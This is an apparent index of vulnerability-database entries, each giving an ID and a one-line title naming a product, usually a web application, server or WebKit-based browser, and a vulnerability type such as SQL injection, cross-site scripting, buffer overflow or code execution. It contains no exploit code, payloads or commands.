[70992] Trend Micro InterScan Web Security Suite patchCmd privilege escalation
[70980] Cisco WebEx Player ATAS32.DLL buffer overflow
[70979] Cisco WebEx Player .wrf file buffer overflow
[70967] Google Chrome Web Audio buffer overflow
[70883] Red Hat Linux Kernel bridge interface denial of service
[70816] Oracle Sun Glassfish Communications Server, GlassFish Enterprise Server, Sun Java System Application Server Web Container unspecified
[70798] Oracle Fusion Middleware Oracle Web Services Manager WSM Console unspecified
[70794] Oracle Siebel CRM Siebel Core - UIF Client User Interface unspecified
[70781] Oracle Fusion Middleware Oracle WebLogic Server Web Services unspecified
[70779] Oracle Fusion Middleware Oracle WebLogic Server WLS Security unspecified
[70762] Oracle Fusion Middleware Oracle WebLogic Portal - unspecified
[70761] Oracle Fusion Middleware Oracle Web Services Manager WSM Console unspecified
[70756] Django web-server cross-site request forgery
[70675] 111WebCalendar unspecified path disclosure
[70564] WebKit DOM windows cross-site scripting
[70518] Apple iTunes WebKit memory code execution
[70507] Apple iTunes memory WebKit code execution
[70502] Apple iTunes unspecified WebKit code execution
[70496] Apple iTunes WebKit code execution
[70467] Kent Web Forum unspecified cross-site scripting
[70456] atvise webMI2ADS Content-Length denial of service
[70455] atvise webMI2ADS shutdown denial of service
[70453] atvise webMI2ADS unspecified directory traversal
[70420] Xerox ColorQube interface security bypass
[70413] radvd set_interface_var() file create symlink
[70365] TinyWebGallery unspecified path disclosure
[70361] WebCalendar unspecified path disclosure
[70360] WeBid unspecified path disclosure
[70359] WEBinsta mailing list manager unspecified path disclosure
[70358] Website Baker unspecified path disclosure
[70323] Google Website Optimizer component for Joomla! pggwob page cross-site scripting
[70293] SonicWALL NSA admin interface cross-site scripting
[70278] OfficeWatch web server directory traversal
[70276] QtWeb Browser URL spoofing
[70207] WordPress Web Minimalist 200901 Theme index.php cross-site scripting
[70168] WebSphere Application Server JSF application information disclosure
[70092] openEngine website.php SQL injection
[70026] IceWarp Web Mail phpinfo() information disclosure
[70025] IceWarp Web Mail XML information disclosure
[69938] Evidalia Web SL categoria.php SQL injection
[69934] Zingiri Web Shop plugin for WordPress wpabspath file include
[69929] AllWebMenus Plugin for WordPress actions.php remote file include
[69914] JlWeb index.php SQL injection
[69875] Google Chrome WebSockets denial of service
[69855] SAP Netweaver com.sap.ipc.webapp.ipcpricing information disclosure
[69851] Minimax productsinfo.php and webShow.php SQL injection
[69845] DivX Plus Web Player DivXPlaybackModule.dll buffer overflow
[69838] IBM WebSphere Commerce Activity Token unspecified
[69835] Palm Pre WebOS LunaSysMgr denial of service
[69833] SAP Netweaver WEBRFC ICF cross-site scripting
[69731] IBM WebSphere Application Server Installation Verification Tool servlet (IVT) cross-site scripting
[69670] WebEmlak Real Estate index.php cross-site scripting
[69657] Babelweb groups privilege escalation
[69656] IBM WebSphere Application Server HTTP Server documentation cross-site scripting
[69646] WebsiteBaker CMS unspecified cross-site scripting
[69592] TOWeb TOWeb.MO denial of service
[69572] eBuddy Web Messenger messaging function cross-site scripting
[69566] mWebnet login.asp SQL injection
[69554] BroadWin WebAccess Client ActiveX control code execution
[69553] BroadWin WebAccess Client ActiveX control code execution
[69552] BroadWin WebAccess Client ActiveX control format string
[69544] WebProfessional default.php SQL injection
[69542] TinyWebGallery tfu_213.swf SQL injection
[69541] TinyWebGallery tfu_213.swf, tfu_upload.php and tfu_login.php file include
[69502] IBM WebSphere Application Server Community Edition Tomcat unspecified
[69484] phpWebSite mod.php SQL injection
[69480] Babelweb user privilege escalation
[69473] IBM WebSphere Application Server administration console directory traversal
[69448] Webkit unspecified memory code execution
[69442] HP SiteScope interface security bypass
[69359] Web Solutions WCS2U id parameter SQL injection
[69316] RoundCube Webmail _mbox parameter cross-site scripting
[69305] Code Widget Online Job Application Web App (ASP) admin.asp SQL injection
[69259] phpWebSite mod.php cross-site scripting
[69252] Website Baker upload.php file upload
[69225] Mozilla Firefox, Thunderbird, and SeaMonkey WebGL buffer overflow
[69220] Mozilla Firefox, Thunderbird, and SeaMonkey WebGL code execution
[69168] Novell Data Synchronizer WebAdmin unauthorized access
[69123] HP webOS unspecified cross-site scripting
[69122] HP webOS unspecified cross-site scripting
[69059] Novell Data Synchronizer Web Admin session hijacking
[69040] IBM WebSphere Service Registry and Repository agentDetect.jsp cross-site scripting
[69028] iWebkit module for Drupal cross-site scripting
[68878] MinaliC Webserver file.php source code disclosure
[68876] MyWebServer unspecified denial of service
[68824] Microsoft Windows Remote Desktop Web Access privilege escalation
[68798] Recipes Website viewRecipe.php SQL injection
[68790] IcedTea6 and IcedTea-Web JNLP security bypass
[68789] IcedTea6 and IcedTea-Web JNLP information disclosure
[68738] Cisco SA 500 Series Security Appliances interface command execution
[68713] Apple Safari WebKit unspecified code execution
[68712] Apple Safari WebKit libxslt code execution
[68711] Apple Safari WebKit unspecified code execution
[68710] Apple Safari WebKit unspecified code execution
[68709] Apple Safari WebKit SVG markers code execution
[68708] Apple Safari WebKit unspecified code execution
[68707] Apple Safari WebKit element code execution
[68706] Apple Safari WebKit NamedNodeMap::setAttributes code execution
[68705] Apple Safari WebKit unspecified code execution
[68704] Apple Safari WebKit RSS information disclosure
[68703] Apple Safari WebKit embedded username cross-site scripting
[68701] Apple Safari WebKit unspecified code execution
[68700] Apple Safari WebKit unspecified code execution
[68699] Apple Safari WebKit unspecified code execution
[68698] Apple Safari WebKit unspecified code execution
[68697] Apple Safari WebKit unspecified code execution
[68696] Apple Safari WebKit FrameOwner code execution
[68695] Apple Safari WebKit styles code execution
[68694] Apple Safari WebKit unspecified code execution
[68693] Apple Safari WebKit unspecified code execution
[68692] Apple Safari WebKit .svg file code execution
[68691] Apple Safari WebKit unspecified code execution
[68689] Apple Safari WebKit unspecified code execution
[68688] Apple Safari AutoFill web forms information disclosure
[68594] Inscribe Webmedia news_body.php SQL injection
[68585] IBM Tivoli Directory Server IDSWebApp information disclosure
[68575] Auto Web Toolbox details.php SQL injection
[68571] WebSphere Application Server Administration Console information disclosure
[68570] WebSphere Application Server logoutExitPage parameter security bypass
[68484] IBM Rational DOORS Web Access
[68471] Mozilla Firefox WebGL information disclosure
[68470] Google Chrome WebGL information disclosure
[68463] Opera unspecified Web page denial of service
[68456] Opera unspecified Web page denial of service
[68455] Opera unspecified Web page denial of service
[68449] Opera Web page denial of service
[68439] Opera Web Workers element denial of service
[68428] Symantec Web Gateway GUI SQL injection
[68417] HP webOS contacts application cross-site scripting
[68410] k5n WebCalendar multiple scripts cross-site scripting
[68409] foo2zjs getweb symlink
[68365] WeBid unspecified SQL injection
[68364] WeBid unspecified file include
[68363] WeBid converter.php code execution
[68352] IBM Rational DOORS Web Access unspecified
[68351] IBM Rational DOORS Web Access Server Error responses unspecified
[68350] IBM Rational DOORS Web Access unspecified cross-site scripting
[68338] IBM Tivoli Directory Server Web Administration Tool information disclosure
[68337] IBM WebSphere Portal and IBM Lotus Web Content Management PageBuilder2 theme cross-site scripting
[68285] NetServe Web Server mimetypes.html cross-site scripting
[68284] NetServe Web Server ssioptions.html cross-site scripting
[68268] RealityServer Web Services RTMP denial of service
[68235] WebCAT cms_view.php SQL injection
[68229] WebSphere MQ CDP extension revocation checking security bypass
[68149] H3C ER5100 Router Web interface authentication bypass
[68146] CIDWeb errpage.asp cross-site scripting
[68142] Mozilla Firefox WebGL code execution
[68141] Mozilla Firefox WebGL denial of service
[68140] Mozilla Firefox WebGL security bypass
[68105] WeblyGo unspecified cross-site scripting
[68104] WeBid newadminuser.php and editadminuser.php cross-site request forgery
[68102] Sunway ForceControl WebServer buffer overflow
[68100] Hitachi Web Server Directory Indexes denial of service
[68081] WeBid error log cross-site scripting
[68080] WeBid adsearch.php SQL injection
[68075] Mozilla Firefox WebGL information disclosure
[68069] IBM Websphere Application Server administrative console cross-site request forgery
[67995] WebFileExplorer user SQL injection
[67964] Polycom IP Phone interface information disclosure
[67944] Microsoft Internet Explorer Web pages information disclosure
[67919] Oracle Java Web Start jnlp code execution
[67866] IBM Web Content Manager authoring tool security bypass
[67849] Simple web-server GET directory traversal
[67839] WebSVN dl.php command execution
[67807] CodeMeter WebAdmin licenses.html cross-site scripting
[67779] Imperva SecureSphere Web Application Firewall Web server cross-site scripting
[67768] Anymacro Mail System interface directory traversal
[67761] Microsoft XML Editor Web Service Discovery information disclosure
[67750] Microsoft Windows Active Directory Certificate Services Web Enrollment cross-site scripting
[67735] IBM Web Content Manager (WCM) StackOverflowError exception denial of service
[67692] Trustwave WebDefend Enterprise Manager Appliance default account
[67687] IBM WebSphere Portal OutputMediator denial of service
[67673] AIDeX Mini-WebServer Nickname cross-site scripting
[67643] Cisco IOS XR SPA interface denial of service
[67628] MidiCMS Website Builder index.php security bypass
[67627] MidiCMS Website Builder unspecified cross-site request forgery
[67594] IBM WebSphere Portal unspecified cross-site scripting
[67563] IBM WebSphere Application Server JAAS security bypass
[67562] IBM WebSphere Application Server Administrative Scripting Tools information disclosure
[67561] IBM WebSphere Application Server Security privilege escalation
[67560] IBM WebSphere Application Server Administrative Console security bypass
[67559] IBM WebSphere Application Server IIOP denial of service
[67546] Webform module for Drupal unspecified file upload
[67545] Webform module for Drupal unspecified cross-site scripting
[67536] IBM WebSphere Application Server Service Integration Bus denial of service
[67535] IBM WebSphere Application Server messaging engine denial of service
[67534] IBM WebSphere Application Server Session Initiation Protocol Proxy denial of service
[67533] IBM WebSphere Application Server com.ibm.ws.jsp.runtime.WASJSPStrBufferImpl denial of service
[67532] IBM WebSphere Application Server org.apache.jasper.runtime.JspWriterImpl.response denial of service
[67531] IBM WebSphere Application Server Security denial of service
[67530] IBM WebSphere Application Server Security unauthorized access
[67529] IBM WebSphere Application Server AuthCache privilege escalation
[67526] IBM WebSphere Application Server SAAJ denial of service
[67506] IBM Datacap Taskmaster Capture Web Client Service unspecified
[67503] Mitel Audio and Web Conferencing multiple cross-site scripting
[67501] Web File Browser file upload
[67479] Imperva SecureSphere Web Application Firewall Web requests security bypass
[67452] IBM Datacap Taskmaster Capture TMWeb component SQL injection
[67430] Google Chrome WebKit glue bad cast execution
[67421] Trustwave WebDefend credentials information disclosure
[67420] Trustwave WebDefend application server default account
[67419] InduSoft Web Studio NTWebServer directory traversal
[67390] HP Palm webOS PDK code execution
[67381] HP Palm webOS Email application code execution
[67357] BlueVoda Website Builder .bvp buffer overflow
[67346] phpWebSite upload.php file upload
[67317] Apple Safari WebKit address bar spoofing
[67278] Horizon Web Builder fshow.php SQL injection
[67267] ICONICS WebHMI ActiveX control buffer overflow
[67249] Proofpoint Protection Server interface command execution
[67248] Proofpoint Protection Server interface SQL injection
[67247] Proofpoint Protection Server interface directory traversal
[67246] Proofpoint Protection Server interface security bypass
[67237] LANSA aXes Web Terminal TN5250 axes_default.css cross-site scripting
[67235] WebAuction test.php cross-site scripting
[67223] 360 Web Manager CMS assetmanager.php path disclosure
[67176] Mozilla Firefox WebGLES buffer overflow
[67156] Google Chrome WebSockets code execution
[67137] Football Website Manager register.php cross-site scripting
[67136] Football Website Manager profile.php SQL injection
[67129] up.time interface security bypass
[67121] Trustwave WebDefend login account privilege escalation
[67115] WebSphere Application Server WS-Security XML encryption weak security
[67110] WebSphere Application Server HTTP Trace cross-site scripting
[67105] CA Arcot WebFort Versatile Authentication Server Arcot Administrative Console spoofing
[67104] CA Arcot WebFort Versatile Authentication Server Arcot Administrative Console cross-site scripting
[67102] WebSphere Application Server installer log directory unauthorized access
[67077] webERP AccountGroups.php cross-site scripting
[67068] Hitachi Web Server request header information disclosure
[67067] Hitachi Web Server SSL information disclosure
[67048] DynMedia Pro Web CMS downloadfile.php directory traversal
[67029] 360 Web Manager CMS assetmanager.php security bypass
[67028] 360 Web Manager CMS assetmanager.php file upload
[67027] Webmin index.cgi cross-site scripting
[67011] Shape Web Solutions CMS imprimir.php SQL injection
[67002] web2Project token SQL injection
[66999] Asterisk Asterisk Manager Interface command execution
[66954] Oracle Sun Java System Access Manager Policy Agent Web Proxy Agent unspecified
[66947] Oracle JD Edwards EnterpriseOne Tools and OneWorld Tools Web Runtime SEC multiple cross-site scripting
[66930] Oracle E-Business Suite Web ADI component unspecified
[66904] CA Output Management Web Viewer UOMWV_Helper ActiveX control buffer overflow
[66903] CA Output Management Web Viewer ActiveX control buffer overflow
[66888] webSPELL index.php and admincenter.php cross-site scripting
[66883] WebKit body code execution
[66882] WebKit SVG code execution
[66881] WebKit DOM Prototype code execution
[66860] WebsiteBaker CMS add.php SQL injection
[66847] Microsoft Windows WebDAV code execution
[66815] RoundCube Webmail login information disclosure
[66793] Best Practical Solutions RT search interface information disclosure
[66785] WebCalendar login.php cross-site scripting
[66770] FiberHome HG-110 Router webproc directory traversal
[66769] FiberHome HG-110 Router webproc cross-site scripting
[66757] WebJaxe administration.php cross-site request forgery
[66684] HP Photosmart Printers webscan information disclosure
[66675] Apache Tomcat web.xml security bypass
[66654] Cyber-Ark PIM Suite Password Vault Web Access cross-site scripting
[66613] RoundCube Webmail modcss.inc security bypass
[66588] Horde IMP and Horde Groupware Webmail fetchmailprefs.php cross-site scripting
[66578] WebCalendar edit_entry_handler.php cross-site scripting
[66536] AR Web Content Manager search.php cross-site scripting
[66523] IBM WEBi unknown unspecified
[66522] IBM WEBi unspecified cross-site scripting
[66516] IBM WebSphere Application Server for z/OS Local OS unauthorized access
[66482] Open Ticket Request System CustomerInterface security bypass
[66471] Cisco Secure Access Control System interface security bypass
[66429] IBM WebSphere DataPower XC10 Appliance denial of service
[66382] webEdition index.php file include
[66375] A1 Website Download DLL code execution
[66372] Easy File Sharing Web Server HTTP directory traversal
[66371] Easy File Sharing Web Server UserID security bypass
[66370] Easy File Sharing Web Server title or message cross-site scripting
[66348] webEdition show.php file include
[66347] webEdition multiple scripts cross-site scripting
[66340] Open Ticket Request System customer-interface ticket-print dialog information disclosure
[66321] wodWebServer.NET GET directory traversal
[66286] Ripe Website Manager admin.php cross-site scripting
[66285] Ripe Website Manager index.php admin.php SQL injection
[66284] Web Wiz Forums multiple SQL injection
[66281] Webform Block Module for Drupal cross-site scripting
[66272] BroadWin and Advantech webvrpcs.exe privilege escalation
[66271] BroadWin and Advantech WebAccess ActiveX control code execution
[66237] Web Poll Pro submit.php cross-site scripting
[66197] CMS WebManager-Pro index.php security bypass
[66196] Open Ticket Request System AgentInterface information disclosure
[66152] Fake Webcam .wmv denial of service
[66151] ASOC 2200 Web Configurator command execution
[66122] CMS WebManager-Pro index.php cross-site scripting
[66117] SSWebPlus CMS info_view.php SQL injection
[66094] Trend Micro WebReputation filter security bypass
[66075] LMS Web Ensino index.php SQL injection
[66074] LMS Web Ensino cross-site request forgery
[66073] LMS Web Ensino index.php cross-site scripting
[66071] LMS Web Ensino index.php cross-site scripting
[66070] LMS Web Ensino cookie session hijacking
[66061] Apple Safari WebKit unspecified code execution
[66052] Google Chrome WebKit style data code execution
[66032] Luch Web Designer page.asp SQL injection
[66019] Maian Weblog index.php SQL injection
[66009] Apple Safari WebKit code execution
[66007] Apple iOS WebKit unspecified code execution
[65999] Apple iOS WebKit HTTP Basic Authentication information disclosure
[65992] WebSphere Application Server Installation Verification Tool servlet (IVT) cross-site scripting
[65965] Google Chrome WebKit context denial of service
[65946] Bacula-Web report.php SQL injection
[65944] Bacula-Web report.php cross-site scripting
[65930] TL-WR740N Web Console and UPnP denial of service
[65871] PyWebDAV MySQLAuthHandler class SQL injection
[65856] phpWebSite custom.php cross-site scripting
[65844] Apple iTunes WebKit code execution variant 49
[65843] Apple iTunes WebKit code execution variant 48
[65842] Apple iTunes WebKit code execution variant 47
[65841] Apple iTunes WebKit code execution variant 46
[65840] Apple iTunes WebKit code execution variant 45
[65839] Apple iTunes WebKit code execution variant 44
[65838] Apple iTunes WebKit code execution variant 43
[65837] Apple iTunes WebKit code execution variant 42
[65836] Apple iTunes WebKit code execution variant 41
[65835] Apple iTunes WebKit code execution variant 40
[65834] Apple iTunes WebKit code execution variant 39
[65833] Apple iTunes WebKit code execution variant 38
[65832] Apple iTunes WebKit code execution variant 37
[65831] Apple iTunes WebKit code execution variant 36
[65830] Apple iTunes WebKit code execution variant 35
[65829] Apple iTunes WebKit code execution variant 34
[65828] Apple iTunes WebKit code execution variant 33
[65827] Apple iTunes WebKit code execution variant 32
[65826] Apple iTunes WebKit code execution variant 31
[65825] Apple iTunes WebKit code execution variant 30
[65824] Apple iTunes WebKit code execution variant 29
[65823] Apple iTunes WebKit code execution variant 28
[65822] Apple iTunes WebKit code execution variant 27
[65821] Apple iTunes WebKit code execution variant 26
[65820] Apple iTunes WebKit code execution variant 25
[65819] Apple iTunes WebKit code execution variant 24
[65818] Apple iTunes WebKit code execution variant 23
[65817] Apple iTunes WebKit code execution variant 22
[65816] Apple iTunes WebKit code execution variant 21
[65815] Apple iTunes WebKit code execution variant 20
[65814] Apple iTunes WebKit code execution variant 19
[65813] Apple iTunes WebKit code execution variant 18
[65812] Apple iTunes WebKit code execution variant 17
[65811] Apple iTunes WebKit code execution variant 16
[65810] Apple iTunes WebKit code execution variant 15
[65809] Apple iTunes WebKit code execution variant 14
[65808] Apple iTunes WebKit code execution variant 13
[65807] Apple iTunes WebKit code execution variant 12
[65806] Apple iTunes WebKit code execution variant 11
[65805] Apple iTunes WebKit code execution variant 10
[65804] Apple iTunes WebKit code execution variant 9
[65803] Apple iTunes WebKit code execution variant 8
[65802] Apple iTunes WebKit code execution variant 7
[65801] Apple iTunes WebKit code execution variant 6
[65800] Apple iTunes WebKit code execution variant 5
[65799] Apple iTunes WebKit code execution variant 4
[65798] Apple iTunes WebKit code execution variant 3
[65797] Apple iTunes WebKit code execution variant 2
[65796] Apple iTunes WebKit code execution variant 1
[65767] IBM Tivoli Netcool/OMNIbus Web GUI SQL injection
[65740] Google Chrome WebGL denial of service
[65738] Google Chrome WebGL denial of service
[65714] WebKit WebCore denial of service
[65674] HP Web Jetadmin unspecified unauthorized access
[65665] F-Secure Policy Manager WebReporting module cross-site scripting
[65664] F-Secure Policy Manager WebReporting module path disclosure
[65663] EDraw Office Viewer Component ActiveX control WebUrl buffer overflow
[65659] Mutare Software Enabled VoiceMail interface cross-site request forgery
[65621] Cisco TelePresence Multipoint Switch interface denial of service
[65604] Cisco TelePresence Recording Server interface file upload
[65577] DIY Web CMS multiple SQL injection
[65576] DIY Web CMS login.asp cross-site scripting
[65537] PIPI Player PIPIWebPlayer ActiveX control buffer overflow
[65504] Intellicom NetBiter WebSCADA default password
[65503] Intellicom NetBiter WebSCADA read.cgi code execution
[65473] webERP InputSerialItemsFile.php file upload
[65436] Cisco Security Agent webagent.exe file upload
[65396] Oracle Java SE and Java for Business Java Runtime Environment Java Webstart loader code execution
[65388] F-Secure Internet Gatekeeper for Linux interface information disclosure
[65357] Control Microsystems ClearSCADA interface information disclosure
[65356] Control Microsystems ClearSCADA interface cross-site scripting
[65274] WebAsyst Shop Script app parameter cross-site scripting
[65218] HP Power Manager interface cross-site request forgery
[65185] Multiple SMCD3G-CCR gateways interface cross-site request forgery
[65174] Xerox WorkCentre Web server command execution
[65160] Apache Tomcat HTML Manager interface cross-site scripting
[65081] TinyWebGallery index.php directory traversal
[65080] TinyWebGallery multiple parameters cross-site scripting
[65077] Cisco WebEx Player ATP buffer overflow
[65076] Cisco WebEx Player recording session buffer overflow
[65075] Cisco WebEx Player ARF buffer overflow
[65074] Cisco WebEx Player ARF buffer overflow
[65073] Cisco WebEx Player ARF buffer overflow
[65072] Cisco WebEx Player ARF buffer overflow
[65063] Simple Web Content Management System item_delete.php security bypass
[65062] Simple Web Content Management System item_delete.php SQL injection
[65050] Apache CouchDB web-based administration UI cross-site scripting
[65039] Weborf get_param_value() buffer overflow
[65024] AB WEB CMS ab_gp_detail.php SQL injection
[65023] AB WEB CMS ab_gp_detail.php cross-site scripting
[65013] Lomtec ActiveWeb Professional EasyEdit.cfm file upload
[64978] web@all 404.php cross-site scripting
[64935] Oracle BEA WebLogic Server Plug-ins HTTP buffer overflow
[64934] Oracle BEA WebLogic Server Plug-ins SSL buffer overflow
[64890] IBM WebSphere Portal and Lotus Web Content Management unspecified information disclosure
[64850] Linksys WRT54GC interface buffer overflow
[64815] Sun Java System Communications Express Web Mail unauthorized access
[64814] Sun Management Center Web console information disclosure
[64812] Sun Convergence Webmail information disclosure
[64783] Oracle Agile Web Client security bypass
[64766] Oracle WebLogic Server Servlet Container unspecified
[64765] Oracle WebLogic Server Node Manager code execution
[64764] Oracle WebLogic Server Servlet Container unspecified
[64737] IBM Tivoli Access Manager for e-business WebSEAL directory traversal
[64697] Sybase EAServer Web services code execution
[64685] MySQL HANDLER interface denial of service
[64678] InduSoft Web Studio and Advantech Studio NTWebServer.exe buffer overflow
[64658] Symantec Web Gateway USERNAME SQL injection
[64628] IBM WebSphere MQ message header buffer overflow
[64606] Cisco ASA WebVPN security bypass
[64603] Cisco ASA emWEB denial of service
[64561] Webform module for Drupal unspecified SQL injection
[64558] WebSphere Application Server console servlet information disclosure
[64554] WebSphere Application Server Web Container cross-site scripting
[64550] IBM WebSphere MQ message buffer overflow
[64482] Microsoft Internet Explorer ReleaseInterface() code execution
[64477] Symantec PGP Universal Web Messenger retryURL phishing
[64471] IBM Tivoli Access Manager for e-business WebSEAL denial of service
[64440] IBM Rational ClearQuest Web client security bypass
[64408] QuickPHP Web Server index.php file download
[64388] Mozilla Firefox WebSockets unspecified
[64377] HotWeb Rentals default.asp SQL injection
[64374] Yektaweb Academic Web Tools browse.php cross-site scripting
[64361] QuickPHP Web Server HTTP directory traversal
[64327] Embedthis Appweb unspecified cross-site scripting
[64301] web@all action.php cross-site request forgery
[64258] Mitel Audio and Web Conferencing (AWC) xml command execution
[64222] Ad Manager Pro website-page.php SQL injection
[64215] WebAdmin and U-Mail URI information disclosure
[64212] Webmail index.php cross-site scripting
[64158] Opera Web page information disclosure
[64052] Meeting Manager WebexUCFObject ActiveX control dynamic-linked library (atucfobj.dll) code execution
[64031] Google Chrome web worker denial of service
[63984] ManageEngine EventLog Analyzer management interface cross-site scripting
[63981] iSpot and ClearSpot webmain.cgi cross-site request forgery
[63979] LiteSpeed Web Server Null buffer overflow
[63961] Google Website Optimizer Control Script cross-site scripting
[63950] RealNetworks Helix Server interface cross-site request forgery
[63808] QtWeb Browser dynamic-linked library (wintab32.dll) code execution
[63769] HP Palm webOS Contacts Application cross-site scripting
[63725] IceWarp Server webmail/basic/ cross-site scripting
[63687] HotWeb Rentals resorts.asp SQL injection
[63670] Palm Pre webOS Contacts unauthorized access
[63652] Google Chrome WebM video support denial of service
[63640] WebSphere Service Registry and Repository EJB security bypass
[63565] Microsoft Windows Consent User Interface privilege escalation
[63515] Kerio Control Web Filter component unspecified
[63479] Linux Kernel shm interface information disclosure
[63467] Micronetsoft RV Dealer Website serach.asp SQL injection
[63434] webApp.secure Content-Length denial of service
[63433] TinyWebGallery multiple scripts cross-site scripting
[63432] TinyWebGallery multiple parameters cross-site scripting
[63406] WebSphere Commerce RunTimeProfileCacheCmdImpl class information disclosure
[63348] Apple Safari WebSockets code execution
[63343] WebRCSdiff viewver.php file include
[63297] openEngine website.php cross-site scripting
[63283] Aficio Web Image monitor cross-site scripting
[63264] Camtron CMNC-200 IP Camera interface security bypass
[63242] Web Host cmsdetail.php SQL injection
[63241] Webmatic index.php SQL injection
[63156] SilverStripe interfaces cross-site request forgery
[63153] WeBid active_auctions.php file include
[63152] WeBid confirm.php cross-site scripting
[63147] IBM WebSphere MQ FDC denial of service
[63140] IBM Omnifind administrative interface buffer overflow
[63114] IBM WebSphere MQ .NET password information disclosure
[63102] Novell GroupWise WebPublisher cross-site scripting
[63101] Novell GroupWise HTTP interface code execution
[63092] Novell GroupWise WebAccess Agent and the Document Viewer Agent directory traversal
[62976] CMS WebManager-Pro index.php cross-site scripting
[62952] WebSphere Commerce sample store pages cross-site scripting
[62951] WebSphere Commerce Organization Admin Console JSPs SQL injection
[62950] WebSphere Application Server JAX-WS request denial of service
[62949] WebSphere Application Server Administrative Console cross-site request forgery
[62948] WebSphere Application Server Administrative Console cross-site scripting
[62947] WebSphere Application Server Administrative Console cross-site scripting
[62936] Webmedia Explorer desc cross-site scripting
[62918] IBM WebSphere Portal SemanticTagService.js cross-site scripting
[62830] Weborf HTTP denial of service
[62826] HP LoadRunner Web Tours denial of service
[62820] Palm Pre webOS camera application file overwrite
[62819] Palm Pre webOS Service API code execution
[62818] Palm Pre webOS Doc Viewer code execution
[62802] Microsoft Forefront Unified Access Gateway Web monitor cross-site scripting
[62669] Google Chrome Web sockets denial of service
[62662] sNews website_title parameter cross-site scripting
[62580] OpenConnect webvpn information disclosure
[62564] Attachmate Reflection for the Web unspecified cross-site scripting
[62522] Oracle WebLogic Server Node Manager file include
[62511] Oracle Java SE and Java for Business Java Web Start unspecified variant 1
[62505] Oracle Java SE and Java for Business Java Web Start unspecified
[62488] Wiki Web Help updateprofile.php cross-site request forgery
[62475] Oracle Sun Products Oracle iPlanet Web Server (Sun Java System Web Server) WebDAV unspecified
[62465] Oracle Sun Products Oracle iPlanet Web Server (Sun Java System Web Server) Administration unspecified
[62464] Oracle Sun Products Oracle iPlanet Web Server (Sun Java System Web Server) Administration unspecified
[62462] Oracle Sun Products Sun Convergence 1, Sun Java Communications Suite 7 Webmail unspecified
[62461] Oracle Sun Products Oracle Communications Messaging Server (Sun Java System Messaging Server) Webmail unspecified
[62460] Oracle Sun Products Oracle Communications Messaging Server (Sun Java System Messaging Server) Web Mail unspecified
[62360] Xweblog arsiv.asp SQL injection
[62359] Xweblog oku.asp SQL injection
[62258] T-dah Uebimiau Webmail index.php file include
[62240] Blue Coat ProxySG user interface cross-site scripting
[62236] Subversion WebDAV module security bypass
[62219] Intellicom NetBiter WebSCADA read.cgi file upload
[62218] Intellicom NetBiter WebSCADA read.cgi information disclosure
[62217] Intellicom NetBiter WebSCADA read.cgi directory traversal
[62197] web2ldap unspecified cross-site scripting
[62183] webSPELL unspecified mail relay
[62179] webSPELL unspecified SQL injection
[62132] webSPELL webspell_settings.php SQL injection
[62131] webSPELL staticID parameter SQL injection
[62130] webSPELL asearch.php SQL injection
[62120] Horde Groupware Webmail icon_browser.php cross-site request forgery
[62119] Horde Groupware Webmail icon_browser.php cross-site scripting
[62059] Horde IMP Webmail Client fm_id cross-site scripting
[61976] RSA Authentication Agent for Web directory traversal
[61906] E-Commerce Webshop index.php SQL injection
[61890] IBM WebSphere Application Server administration console denial of service
[61881] NitroSecurity NitroView Enterprise Security Manager interface privilege escalation
[61825] AXIGEN Mail Server Ajax WebMail cross-site scripting
[61797] Free Discussion Forums App_Web_wngcbiby.dll security bypass
[61778] IBM Proventia Network Mail Security System interface cross-site request forgery
[61750] Symphony CMS fields[website] cross-site scripting
[61650] Weborf URL directory traversal
[61636] Microsoft Exchange Server Outlook Web Access cross-site request forgery
[61619] MicroNetSoft Rental Property Management Website detail.asp SQL injection
[61611] Micronetsoft RV Dealer Website detail.asp SQL injection
[61593] CMS WebManager-Pro c.php SQL injection
[61568] Google Chrome WebSockets code execution
[61567] Google Chrome WebSockets denial of service
[61505] Web Ideas Web Shop Standard index.php SQL injection
[61466] Wiccle Web Builder post_text parameter cross-site scripting
[61435] IBM WebSphere Application Server Timestamp element weak security
[61400] Valarsoft Webmatic user editing script cross-site request forgery
[61373] GFI WebMonitor proxy cross-site scripting
[61328] Cisco WebEx Player ARF buffer overflow
[61244] WebKit Geolocation.cpp unspecified
[61200] WebKit geolocation events code execution
[61199] WebKit WebCore::toAlphabetic() code execution
[61198] WebKit unspecified information disclosure
[61197] Ezyweb CMS insert.image.php file upload
[61196] Ezyweb CMS loginvalid.php SQL injection
[61182] i-Web Suite default.asp SQL injection
[61181] i-Web Suite default.asp cross-site scripting
[61144] Weblinks component for Joomla! itemid parameter SQL injection
[61134] Palm Pre webOS multiple unspecified
[61133] Palm Pre webOS vCard code execution
[61110] ServletExec administration interface security bypass
[61059] Webkit PDFs (webkitpdf) extension for TYPO3 unspecified SQL injection
[61058] Webkit PDFs (webkitpdf) extension for TYPO3 unspecified command execution
[61053] Cisco Unified Wireless Network (UWN) Solution WEBAUTH_REQD state security bypass
[61050] Cisco Unified Wireless Network (UWN) Solution virtual interface denial of service
[61012] PHP-Nuke Web_Links module url parameter SQL injection
[60994] Amlib NetOpacs webquery.dll buffer overflow
[60986] IBM WebSphere Service Registry and Repository searchterm cross-site scripting
[60890] SUSE WebYaST key security bypass
[60889] PMSoftware Simple Web Server header denial of service
[60879] QtDemoBrowser webview.cpp cross-site scripting
[60878] kwebkitpart webkitpart.cpp cross-site scripting
[60873] APT Webshop System modules.php SQL injection
[60768] JBoss Enterprise SOA Platform web-console security bypass
[60729] Nessus Web Server plugin for Nessus feed method information disclosure
[60726] Nessus Web Server plugin for Nessus unspecified cross-site scripting
[60670] Apple Mac OS X webdav_mount() denial of service
[60658] Wing FTP Server Web client information disclosure
[60638] IBM WebSphere MQ disk space denial of service
[60633] Pre Web Host login SQL injection
[60604] LILDBI-WEB uploader.php file upload
[60586] WebKit WebSocketHandshake::readServerHandshake code execution
[60576] WebCalendar multiple unspecified cross-site scripting
[60574] WebPress id_num_mod parameter cross-site scripting
[60573] MyWebFTP index.php SQL injection
[60570] ATutor interface cross-site request forgery
[60567] Cisco Content Delivery System Cisco Internet Streamer web server directory traversal
[60561] Microsoft Exchange Server Outlook Web Access cross-site request forgery
[60551] Multiple HiWeb Wiesbaden Auktions products cafe.php SQL injection
[60538] SAP J2EE Engine Core Navigator Interface cross-site scripting
[60531] Mozilla Firefox, Thunderbird, and SeaMonkey Web Worker information disclosure
[60519] Asidus WebWizard index.php SQL injection
[60420] Novell GroupWise WebAccess component buffer overflow
[60419] Novell GroupWise WebAccess component HTTP header injection
[60418] Novell GroupWise WebAccess component cross-site scripting
[60412] Juniper IVE OS interface welcome.cgi cross-site scripting
